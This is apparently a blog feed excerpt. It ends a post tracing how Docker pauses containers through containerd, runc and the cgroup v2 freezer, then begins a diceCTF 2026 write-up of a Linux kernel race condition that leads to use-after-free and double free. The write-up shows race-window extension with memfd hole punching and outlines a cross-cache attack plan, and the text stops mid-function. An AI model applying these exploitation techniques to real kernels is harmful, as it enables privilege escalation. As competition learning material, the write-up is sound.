    <span class="n">taskAPI</span><span class="o">.</span><span class="n">RegisterTTRPCTaskService</span><span class="p">(</span><span class="n">server</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">RegisterTTRPCTaskService</span><span class="p">(</span><span class="n">srv</span> <span class="o">*</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">Server</span><span class="p">,</span> <span class="n">svc</span> <span class="n">TTRPCTaskService</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">srv</span><span class="o">.</span><span class="n">RegisterService</span><span class="p">(</span><span class="s">"containerd.task.v2.Task"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">ServiceDesc</span><span class="p">{</span>
        <span class="n">Methods</span><span class="o">:</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">Method</span><span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="s">"Pause"</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">unmarshal</span> <span class="k">func</span><span class="p">(</span><span class="k">interface</span><span class="p">{})</span> <span class="kt">error</span><span class="p">)</span> <span class="p">(</span><span class="k">interface</span><span class="p">{},</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span> <span class="c">// [3]</span>
                <span class="k">var</span> <span class="n">req</span> <span class="n">PauseRequest</span>
                <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">unmarshal</span><span class="p">(</span><span class="o">&amp;</span><span class="n">req</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span> <span class="p">}</span>
                <span class="k">return</span> <span class="n">svc</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">req</span><span class="p">)</span>
            <span class="p">},</span>
            <span class="o">...</span>
        <span class="p">},</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">svc.Pause()</code> call eventually reaches the <code class="language-plaintext highlighter-rouge">Pause()</code> function in <code class="language-plaintext highlighter-rouge">containerd/go-runc/runc.go</code>, which simply runs the command <code class="language-plaintext highlighter-rouge">runc pause &lt;id&gt;</code> [4] to pause the container. Interesting!</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/containerd-shim-runc-v2/task/service.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">taskAPI</span><span class="o">.</span><span class="n">PauseRequest</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">ptypes</span><span class="o">.</span><span class="n">Empty</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">getContainer</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">ID</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="n">s</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="o">&amp;</span><span class="n">eventstypes</span><span class="o">.</span><span class="n">TaskPaused</span><span class="p">{</span>
        <span class="n">ContainerID</span><span class="o">:</span> <span class="n">container</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// cmd/containerd-shim-runc-v2/runc/container.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">c</span><span class="o">.</span><span class="n">process</span><span class="o">.</span><span class="p">(</span><span class="o">*</span><span class="n">process</span><span class="o">.</span><span class="n">Init</span><span class="p">)</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// cmd/containerd-shim-runc-v2/process/init.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">p</span> <span class="o">*</span><span class="n">Init</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">p</span><span class="o">.</span><span class="n">initState</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// cmd/containerd-shim-runc-v2/process/init_state.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">runningState</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">p</span><span class="o">.</span><span class="n">runtime</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">s</span><span class="o">.</span><span class="n">p</span><span class="o">.</span><span class="n">id</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/go-runc/runc.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">Runc</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">context</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">id</span> <span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">r</span><span class="o">.</span><span class="n">runOrError</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">command</span><span class="p">(</span><span class="n">context</span><span class="p">,</span> <span class="s">"pause"</span><span class="p">,</span> <span class="n">id</span><span class="p">))</span> <span class="c">// [4]</span>
<span class="p">}</span>
</code></pre></div></div>
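
<p>The final step of this chain boils down to spawning a child process. As a rough illustration only, written in C rather than Go, here is a minimal sketch that runs <code class="language-plaintext highlighter-rouge">&lt;binary&gt; &lt;subcommand&gt; &lt;id&gt;</code> and collects the exit status. The helper name <code class="language-plaintext highlighter-rouge">run_runtime()</code> is hypothetical, and the sketch ignores any global flags that go-runc may place in front of the subcommand.</p>

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical helper (not part of containerd or go-runc): run
 * "<binary> <subcommand> <id>" in a child process and return its exit
 * status, or -1 if the child could not be spawned or died from a signal.
 */
int run_runtime(const char *binary, const char *subcommand, const char *id)
{
    assert(binary != NULL && subcommand != NULL && id != NULL);

    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: replace the process image with the runtime binary. */
        char *const argv[] = {
            (char *)binary, (char *)subcommand, (char *)id, NULL
        };
        execvp(binary, argv);
        _exit(127); /* Only reached if execvp() failed. */
    }

    /* Parent: wait for the child and report how it exited. */
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">run_runtime("runc", "pause", id)</code> would roughly mirror what the shim does here, assuming <code class="language-plaintext highlighter-rouge">runc</code> is on <code class="language-plaintext highlighter-rouge">PATH</code> and the caller has sufficient privileges.</p>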

<h2 id="5-runc">5. runc</h2>

<p>From the previous section, we learned that the shim daemon handles a pause request by <strong>forking a new process and executing <code class="language-plaintext highlighter-rouge">runc</code></strong>. But what exactly is <code class="language-plaintext highlighter-rouge">runc</code>?</p>

<p><a href="https://github.com/opencontainers/runc">runc</a> is a <strong>low-level container runtime</strong>, also known as an OCI (Open Container Initiative) runtime. Its job is to control containers directly: creating a new container, listing the processes inside a container, and so on.</p>

<p>We’ll continue using “pause a container” as our example. The variable <code class="language-plaintext highlighter-rouge">pauseCommand</code> in <code class="language-plaintext highlighter-rouge">pause.go</code> defines how the pause command works, and other commands follow a similar pattern: a file named <code class="language-plaintext highlighter-rouge">&lt;command_name&gt;.go</code> with a corresponding variable <code class="language-plaintext highlighter-rouge">&lt;command_name&gt;Command</code>.</p>

<p>The <code class="language-plaintext highlighter-rouge">Action</code> field shows the implementation: check arguments, get the container, and pause it [1].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pause.go</span>
<span class="k">var</span> <span class="n">pauseCommand</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">{</span>
    <span class="n">Name</span><span class="o">:</span>  <span class="s">"pause"</span><span class="p">,</span>
    <span class="n">Usage</span><span class="o">:</span> <span class="s">"pause suspends all processes inside the container"</span><span class="p">,</span>
    <span class="n">ArgsUsage</span><span class="o">:</span> <span class="s">`&lt;container-id&gt;

Where "&lt;container-id&gt;" is the name for the instance of the container to be
paused. `</span><span class="p">,</span>
    <span class="n">Description</span><span class="o">:</span> <span class="s">`The pause command suspends all processes in the instance of the container.

Use runc list to identify instances of containers and their current status.`</span><span class="p">,</span>
    <span class="c">// Disable comma as separator for slice flags.</span>
    <span class="n">DisableSliceFlagSeparator</span><span class="o">:</span> <span class="no">true</span><span class="p">,</span>
    <span class="n">Action</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">_</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">cmd</span> <span class="o">*</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">checkArgs</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="m">1</span><span class="p">,</span> <span class="n">exactArgs</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
            <span class="k">return</span> <span class="n">err</span>
        <span class="p">}</span>
        <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">getContainer</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">container</span><span class="o">.</span><span class="n">Pause</span><span class="p">()</span> <span class="c">// [1]</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="no">nil</span>
    <span class="p">},</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">Pause()</code> checks that the container is in the <code class="language-plaintext highlighter-rouge">Running</code> or <code class="language-plaintext highlighter-rouge">Created</code> state, and then calls <code class="language-plaintext highlighter-rouge">c.cgroupManager.Freeze()</code> [2]. There are two cgroup versions, v1 and v2, so <code class="language-plaintext highlighter-rouge">c.cgroupManager</code> could be a manager for either one. Here, we’ll assume v2 is being used.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/container_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">Pause</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">status</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">currentStatus</span><span class="p">()</span>
    <span class="c">// [...]</span>
    <span class="k">switch</span> <span class="n">status</span> <span class="p">{</span>
    <span class="k">case</span> <span class="n">Running</span><span class="p">,</span> <span class="n">Created</span><span class="o">:</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">cgroupManager</span><span class="o">.</span><span class="n">Freeze</span><span class="p">(</span><span class="n">cgroups</span><span class="o">.</span><span class="n">Frozen</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [2]</span>
            <span class="k">return</span> <span class="n">err</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>With cgroup version 2, referred to as <code class="language-plaintext highlighter-rouge">cgroupv2</code> in the code, the manager delegates to <code class="language-plaintext highlighter-rouge">fs2</code> as its filesystem manager, and the <code class="language-plaintext highlighter-rouge">Freeze()</code> handler there in turn calls <code class="language-plaintext highlighter-rouge">setFreezer()</code> [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/opencontainers/cgroups/systemd/v2.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">m</span> <span class="o">*</span><span class="n">UnifiedManager</span><span class="p">)</span> <span class="n">Freeze</span><span class="p">(</span><span class="n">state</span> <span class="n">cgroups</span><span class="o">.</span><span class="n">FreezerState</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// m.fsMgr is assigned to 'fs2.NewManager(config, m.path)' in NewUnifiedManager()</span>
    <span class="k">return</span> <span class="n">m</span><span class="o">.</span><span class="n">fsMgr</span><span class="o">.</span><span class="n">Freeze</span><span class="p">(</span><span class="n">state</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/opencontainers/cgroups/fs2/fs2.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">m</span> <span class="o">*</span><span class="n">Manager</span><span class="p">)</span> <span class="n">Freeze</span><span class="p">(</span><span class="n">state</span> <span class="n">cgroups</span><span class="o">.</span><span class="n">FreezerState</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">setFreezer</span><span class="p">(</span><span class="n">m</span><span class="o">.</span><span class="n">dirPath</span><span class="p">,</span> <span class="n">state</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The freezer opens the pseudo-file <code class="language-plaintext highlighter-rouge">cgroup.freeze</code> [4] and writes the new state to it [5] to <strong>update the status of the associated container</strong>, causing all of its processes to be frozen.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/opencontainers/cgroups/fs2/freezer.go</span>
<span class="k">func</span> <span class="n">setFreezer</span><span class="p">(</span><span class="n">dirPath</span> <span class="kt">string</span><span class="p">,</span> <span class="n">state</span> <span class="n">cgroups</span><span class="o">.</span><span class="n">FreezerState</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">fd</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">cgroups</span><span class="o">.</span><span class="n">OpenFile</span><span class="p">(</span><span class="n">dirPath</span><span class="p">,</span> <span class="s">"cgroup.freeze"</span><span class="p">,</span> <span class="n">unix</span><span class="o">.</span><span class="n">O_RDWR</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">fd</span><span class="o">.</span><span class="n">WriteString</span><span class="p">(</span><span class="n">stateStr</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
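
<p>The same effect can be reproduced without <code class="language-plaintext highlighter-rouge">runc</code> by writing to the pseudo-file directly. The sketch below is in C rather than Go and is not the runc implementation. <code class="language-plaintext highlighter-rouge">set_freezer()</code> is a hypothetical helper, and it assumes cgroup v2, where writing <code class="language-plaintext highlighter-rouge">1</code> freezes the cgroup and <code class="language-plaintext highlighter-rouge">0</code> thaws it.</p>

```c
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/*
 * Hypothetical helper: write "1" (freeze) or "0" (thaw) to
 * <cgroup_dir>/cgroup.freeze. Returns 0 on success and -1 on failure.
 */
int set_freezer(const char *cgroup_dir, int frozen)
{
    assert(cgroup_dir != NULL);

    char path[4096];
    int n = snprintf(path, sizeof(path), "%s/cgroup.freeze", cgroup_dir);
    if (n < 0 || (size_t)n >= sizeof(path))
        return -1;

    /* No O_CREAT: the kernel provides this file for every v2 cgroup. */
    int fd = open(path, O_RDWR);
    if (fd < 0)
        return -1;

    const char *state = frozen ? "1" : "0";
    ssize_t written = write(fd, state, 1);
    close(fd);
    return written == 1 ? 0 : -1;
}
```

<p>For example, <code class="language-plaintext highlighter-rouge">set_freezer("/sys/fs/cgroup/&lt;container-cgroup&gt;", 1)</code> would freeze a container, where the placeholder path depends on the cgroup driver and layout of the host.</p>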

<h2 id="6-summary">6. Summary</h2>

<p>The first post only focuses on the communication methods and the relationship between each component. In the next two posts, I will cover the attack surfaces and some past vulnerabilities, as well as the NVIDIA toolkit implementation.</p>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[For this year’s (2026) Pwn2Own Berlin, I tried to find vulnerabilities in Docker but came up with nothing. This post simply documents my research on Docker’s system implementation, since it is quite interesting.]]></summary></entry><entry><title type="html">diceCTF 2026 - cornelslop</title><link href="https://u1f383.github.io/linux/2026/03/09/dicectf-2026-corkelslop.html" rel="alternate" type="text/html" title="diceCTF 2026 - cornelslop" /><published>2026-03-09T00:00:00+00:00</published><updated>2026-03-09T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/03/09/dicectf-2026-corkelslop</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/03/09/dicectf-2026-corkelslop.html"><![CDATA[<p>This week I played diceCTF 2026 with team <strong>fewer</strong> and spent 12 hours solving a Linux kernel challenge, <strong>cornelslop</strong>. This post is a simple writeup without too much detail, and you can find the full exploit <a href="/assets/dicectf-2026-cornelslop-exp.c">here</a>.</p>

<h2 id="1-bug">1. Bug</h2>

<p>There is a <strong>race condition</strong> between <code class="language-plaintext highlighter-rouge">delete_entry()</code> and <code class="language-plaintext highlighter-rouge">check_entry()</code>.</p>

<p><code class="language-plaintext highlighter-rouge">check_entry()</code> [1] calls <code class="language-plaintext highlighter-rouge">xa_load()</code> to retrieve the entry without holding a spinlock or the RCU read lock, so it is possible that <strong>the entry has been deleted</strong> by <code class="language-plaintext highlighter-rouge">delete_entry()</code> in the meantime. Later, <code class="language-plaintext highlighter-rouge">destruct_entry()</code> [2] is called on the already released object and <strong>frees it a second time</strong>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">check_entry</span><span class="p">(</span><span class="k">struct</span> <span class="n">cornelslop_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint8_t</span> <span class="n">shash</span><span class="p">[</span><span class="n">SHA256_DIGEST_SIZE</span><span class="p">];</span>
    <span class="k">struct</span> <span class="n">cornelslop_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="n">e</span> <span class="o">=</span> <span class="n">xa_load</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cornelslop_xa</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">id</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="c1">// [...]</span>
    
    <span class="n">ret</span> <span class="o">=</span> <span class="n">sha256_va_range</span><span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">va_start</span><span class="p">,</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">va_end</span><span class="p">,</span> <span class="n">shash</span><span class="p">);</span>
    <span class="n">ue</span><span class="o">-&gt;</span><span class="n">corrupted</span> <span class="o">=</span> <span class="n">memcmp</span><span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">shash</span><span class="p">,</span> <span class="n">shash</span><span class="p">,</span> <span class="n">SHA256_DIGEST_SIZE</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">corrupted</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">xa_erase</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cornelslop_xa</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">id</span><span class="p">);</span>
        <span class="n">destruct_entry</span><span class="p">(</span><span class="n">e</span><span class="p">);</span> <span class="c1">// [2]</span>
        <span class="c1">// [...]</span>
    <span class="p">}</span>

<span class="nl">finish:</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The flow that triggers the UAF and the double free is as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Thread-1]                               [Thread-2]
delete_entry()                           check_entry()
                                          e = xa_load(&amp;cornelslop_xa, ue-&gt;id)
                                          sha256_va_range(e-&gt;va_start, e-&gt;va_end, shash)
                                           ...
 e = xa_erase(&amp;cornelslop_xa, ue-&gt;id)
 destruct_entry(e)
  call_rcu(&amp;e-&gt;rcu, destruct_entry_rcu)

[=== RCU ===]                             [=== context switch ===]
destruct_entry_rcu()
 kfree(e)
                                          access e &lt;--- UAF
                                          destruct_entry(e) &lt;--- double free
</code></pre></div></div>

<h2 id="2-problems">2. Problems</h2>

<h3 id="21-race-window--rcu">2.1. Race window &amp; RCU</h3>

<p>But the problem is that the RCU callback is only triggered after <strong>some time (the RCU grace period)</strong> and <strong>a context switch on each CPU</strong>, so <code class="language-plaintext highlighter-rouge">sha256_va_range()</code> has to run for a long time.</p>

<p>I used the <strong>shared memory trick</strong> to extend the race window; see <a href="https://faith2dxy.xyz/2025-11-28/extending_race_window_fallocate/">Faith’s post</a> for more details. The only difference is that the environment has no ramfs mountpoint, so I used <code class="language-plaintext highlighter-rouge">memfd_create</code> instead.</p>

<p>Internally, the shared memory page fault handler calls <code class="language-plaintext highlighter-rouge">shmem_falloc_wait()</code> to wait for the hole punch to finish. That function calls <code class="language-plaintext highlighter-rouge">schedule()</code> [1] to perform a context switch, which also satisfies one of the conditions for triggering the RCU callback.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">vm_fault_t</span> <span class="nf">shmem_falloc_wait</span><span class="p">(</span><span class="k">struct</span> <span class="n">vm_fault</span> <span class="o">*</span><span class="n">vmf</span><span class="p">,</span> <span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">shmem_falloc</span> <span class="o">&amp;&amp;</span>
        <span class="n">shmem_falloc</span><span class="o">-&gt;</span><span class="n">waitq</span> <span class="o">&amp;&amp;</span>
        <span class="n">vmf</span><span class="o">-&gt;</span><span class="n">pgoff</span> <span class="o">&gt;=</span> <span class="n">shmem_falloc</span><span class="o">-&gt;</span><span class="n">start</span> <span class="o">&amp;&amp;</span>
        <span class="n">vmf</span><span class="o">-&gt;</span><span class="n">pgoff</span> <span class="o">&lt;</span> <span class="n">shmem_falloc</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// [...]</span>
        <span class="n">prepare_to_wait</span><span class="p">(</span><span class="n">shmem_falloc_waitq</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">shmem_fault_wait</span><span class="p">,</span>
                <span class="n">TASK_UNINTERRUPTIBLE</span><span class="p">);</span>
        <span class="n">spin_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_lock</span><span class="p">);</span>
        <span class="n">schedule</span><span class="p">();</span> <span class="c1">// [1]</span>
        <span class="c1">// [...]</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
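
<p>To make the setup concrete, here is a minimal sketch of the two building blocks of the trick: a shared mapping backed by <code class="language-plaintext highlighter-rouge">memfd_create</code> and a hole punch over it. The helper names <code class="language-plaintext highlighter-rouge">map_memfd()</code> and <code class="language-plaintext highlighter-rouge">punch_hole()</code> are hypothetical, and this is an illustration rather than the code from the full exploit.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Hypothetical helper: create an anonymous shmem-backed file of `len` bytes
 * and map it MAP_SHARED. Stores the file descriptor in *fd_out and returns
 * the mapping, or NULL on failure.
 */
unsigned char *map_memfd(size_t len, int *fd_out)
{
    assert(fd_out != NULL);

    int fd = memfd_create("race-window", 0);
    if (fd < 0)
        return NULL;
    if (ftruncate(fd, (off_t)len) < 0) {
        close(fd);
        return NULL;
    }

    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (p == MAP_FAILED) {
        close(fd);
        return NULL;
    }

    *fd_out = fd;
    return p;
}

/*
 * Hypothetical helper: drop the backing pages of [0, len) while keeping the
 * file size, so the next access to the mapping has to fault the pages in again.
 */
int punch_hole(int fd, size_t len)
{
    return fallocate(fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
                     0, (off_t)len);
}
```

<p>In the race scenario, one thread would call <code class="language-plaintext highlighter-rouge">punch_hole()</code> while the kernel is reading the mapped range in another thread, so that the resulting page fault ends up waiting in <code class="language-plaintext highlighter-rouge">shmem_falloc_wait()</code>.</p>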

<h3 id="22-cross-the-cache">2.2. Cross the cache</h3>

<p>Even with a double free primitive, we cannot do much on its own because entries are allocated from a dedicated cache, <code class="language-plaintext highlighter-rouge">cornelslop_entry_cachep</code>. So the only way to exploit it is to <strong>perform a cross-cache attack</strong>.</p>

<p>We first allocate another entry to <strong>reclaim the freed object</strong>, and once the RCU callback is triggered, the object is released again. This allows us to <strong>hold a reference from the xarray to the UAF object</strong>.</p>

<p>To achieve the cross-cache attack, we have to spray lots of entries at the beginning, but because of the range of <code class="language-plaintext highlighter-rouge">alloc_id()</code>, we can allocate at most <code class="language-plaintext highlighter-rouge">MAX_ENTRIES</code> (128) entries, which is far from enough.</p>

<p>Unlike <a href="https://kqx.io/writeups/cornelslop/#the-multicore-trick">kqx’s solution</a>, which leveraged the object releasing mechanism in a multicore environment, I chose a relatively stupid and brute-force way to spray entries.</p>

<p>We found that there is a <code class="language-plaintext highlighter-rouge">sha256_va_range()</code> [1] call between the entry allocation and <code class="language-plaintext highlighter-rouge">alloc_id()</code>. In theory, we can spawn thousands of threads and use the shared memory trick again to extend the race window. Each one allocates an entry and all of them are released after some time [2]. This allows us to allocate more than <code class="language-plaintext highlighter-rouge">MAX_ENTRIES</code> entries!</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">add_entry</span><span class="p">(</span><span class="k">struct</span> <span class="n">cornelslop_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">cornelslop_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">,</span> <span class="o">*</span><span class="n">old</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">id</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">va_end</span> <span class="o">&lt;</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">va_start</span><span class="p">)</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

